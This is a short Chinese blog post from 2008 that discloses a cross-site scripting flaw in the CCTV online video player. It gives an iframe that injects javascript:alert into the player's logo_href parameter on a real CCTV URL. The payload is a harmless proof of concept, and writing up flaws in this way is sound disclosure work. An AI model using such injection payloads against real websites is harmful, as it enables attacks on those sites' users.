CCTV视频播放器XSS
先看一下CCTV1在线视频,点击haier 的广告 logo 标志将产生XSS:
<iframe src="http://t.live.cctv.com/cctvwebplay/cctvplayer.html?channel=cctv_p2p_cctv1&width=576&height=320&logo_href=javascript:alert(11111);" id="video" name='video' frameborder="1" scrolling="no" style="height:352px;width:566px"></iframe>
转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:CCTV视频播放器XSS
本文地址:http://www.woyigui.cn/2008/08/10/cctv-xss/
最新评论